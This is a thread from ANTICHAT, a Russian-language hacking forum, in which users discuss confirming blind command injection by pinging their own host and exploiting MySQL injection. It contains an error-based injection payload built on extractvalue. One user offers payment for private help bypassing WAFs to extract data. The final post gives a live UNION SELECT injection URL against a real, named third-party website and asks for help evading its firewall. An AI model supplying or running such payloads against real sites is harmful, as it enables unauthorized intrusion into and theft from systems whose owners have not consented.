ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.10.2019, 18:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 169390
Репутация:
47
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера.
Стандартом ведь ни на винде, ни на линуксах пинги не логируются, или я ошибаюсь?
Сообщение от BabaDook
BabaDook said:
↑
Тогда можешь выполнять системные команды. и сразу получить шелл. даже заливать ничего не надо
так у него и так сразу системная шелл вылазит
Сообщение от noppathee
noppathee said:
↑

|
|
|
|

13.10.2019, 01:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 92829
Репутация:
212
|
|
Сообщение от BabaDook
BabaDook said:
↑
нам не надо получать вывод команд.
Визуализируя всё это дело человеку проще будет, сложно учиться когда не видишь и не особо понимаешь что происходит
Сообщение от BabaDook
BabaDook said:
↑
Есть возможность получить шелл, и кстати вывод команд тоже можно получить
По линку есть материал на эту тему
Сообщение от fandor9
fandor9 said:
↑
Стандартом ведь ни на винде, ни на линуксах пинги не логируются, или я ошибаюсь?
Хорошо что заметил, еще бы линк добавить
/threads/434712/
Тут впринципе весь ответ сводится к ссылке на одну тему из которой становится ясно что делать дальше
|
|
|
|

13.10.2019, 01:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
Визуализируя всё это дело человеку проще будет, сложно учиться когда не видишь и не особо понимаешь что происходит
/threads/434712/
Согласен. самое простое конечно пинг на свой хост. Дальше от этого уже плясать.
|
|
|
|

13.10.2019, 14:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 169390
Репутация:
47
|
|
Сообщение от Baskin-Robbins
Baskin-Robbins said:
↑
По линку есть материал на эту тему
Хорошо что заметил, еще бы линк добавить
/threads/434712/
Тут впринципе весь ответ сводится к ссылке на одну тему из которой становится ясно что делать дальше
В принципе на линуксе всё достаточно просто
Код:
Code:
iptables -I INPUT -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j LOG --log-level=1 --log-prefix "Ping Request "
и затем в консоли включаем
Код:
Code:
dmesg --follow
и там уже видим идёт ли пинг и от какого адреса (SRC=). Но опять-тако зависит от того, как настроена система, может быть что пинги до этого сбрасывает раутер.
На винде это немного сложнее, нужно сначала сконфигурировать брандмауэр винды и потом уже смотреть логи брандмауэра.
|
|
|
|

28.10.2019, 11:12
|
|
Guest
Сообщений: n/a
Провел на форуме: 2479
Репутация:
3
|
|
Попалась ситуация при раскрутке SQL иньекта, из которой не могу выбраться, буду признателен, если кто что подскажет.
Имеем вот такой MySql запрос:
Код:
Code:
SELECT test_value from table
where testmemo LIKE \'%'.$_POST['SQL'].'%\'
ORDER BY LOCATE(\''.$_POST['SQL'].'\',index);
Фильтруются символы # и * (без разницы, сырые, или в urlencode).
Комментарий -- 1 не срабатывает, хотя и не фильтруется. Кавычка ` в качестве комментария тоже не работает (про нулл байт вообще молчу).
Вставить например error-based вектор, а всё остальное закомментировать не получается, следовательно остается корректно достроить существующий запрос, но вот тут и начинаются проблемы.
Наш иньект попадает в запрос сразу в двух местах, в одном месте он обрамлен одинарными кавычками, а во втором случае ещё и взят в скобки.
И как в данной ситуации выкрутиться я не могу сообразить.
|
|
|
|

28.10.2019, 11:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от to the moon
to the moon said:
↑
Вставить например error-based вектор, а всё остальное закомментировать не получается
Код:
Code:
' AND extractvalue(1,concat(0x3a,(select @@version)))-'
|
|
|
|

28.10.2019, 14:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 1798
Репутация:
0
|
|
Уже не в первый раз встречаюсь с ситуацией, когда раскрутив MySQL иньект, при попытке взаимодействия с существующей таблицей, SQL иньект пропадает, и при этом если указать несуществующую таблицу, то всё ок.
Т.е. при запросе select count(*) from not_exists_table (который следует как подзапрос в error или union based векторах), если таблицы нет, то будет стандартная ошибка Table 'not_exists_table' doesn't exist
Если же указать реально существующую, то как будто SQL фильтруется. И так на очень многих сайтах. Сайты разные, и друг с другом никак не взаимосвязаны.
Если кто знает, как решить эту беду, подскажите.
|
|
|
|

28.10.2019, 14:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 12641
Репутация:
0
|
|
Напишу сюда.
ребята, кто шарит в sql inj, возможно кто-то желает оказывать персональную помощь, по различным вопросам в джабер за оплату?
Вопросы в основном по WAF и извлечению данных. (допустим почему выдает 500 ошибку или 400, к примеру)
Как заливать шелы, получать права и прочее такое не нужно.
Я мало в этом шарю, пользуюсь sqlmap и burp (automated scan), поэтому объяснять нужно как чайнику доступным языком.
Именно поэтому готов платить за помощь.
Так же сотрудничество на перспективу, я щедрый, с теми кто со мной честен и добр)))))
У меня не совсем тривиальная ситуация, объясню в джабере.
Пишите : 7jon7doe@cluster.sx
Много вашего времени не займу, в день может пара тройка вопросов!
Чуть дополню, мне скорее подойдет человек, который шарит в коде и чуть в скуле. На какие то вопросы ты мне ответишь, в каких-то вместе будем разбираться. Я это к тому, что врятли опытному хакеру нужна будет мелочь))
|
|
|
|

30.10.2019, 06:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 22457
Репутация:
10
|
|
помогите раздекодить строку. Проверяю и API и вся инфа с формы отправляется в таком виде
Код:
Code:
5d000008007200000000000000003d8888865474ae3953ed45d37f263bd75edbffa14070ca8100680ed91a004e8f482ba622d6df8a57cf5800cbf802a3eaa2e536c0c7f9c0c3d50668e4f56367357f70f75394537e88edff509845cb5dba03414af6cefedcc2c0c0fe453ca5ff57f3b216a833480a6dc4
Похоже на hex, но когда пробую декодить выдает какие то непонятные символы. Сайт китайский, может дело в этом. И как в таком случае с этим работать, потому что ни берпом, ни онлайн не вышло
|
|
|
|

02.11.2019, 18:03
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Помогите ваф обойти
Код:
Code:
https://www.lfv.li/nationalmannschaften/u21-nationalmannschaft/mannschaft/detail/?tx_cfcleagueext_pi4%5BprofileId%5D=2057+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,34,37,38,39,40,41,42,43,44,45,46,47,48,49,50+--+
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|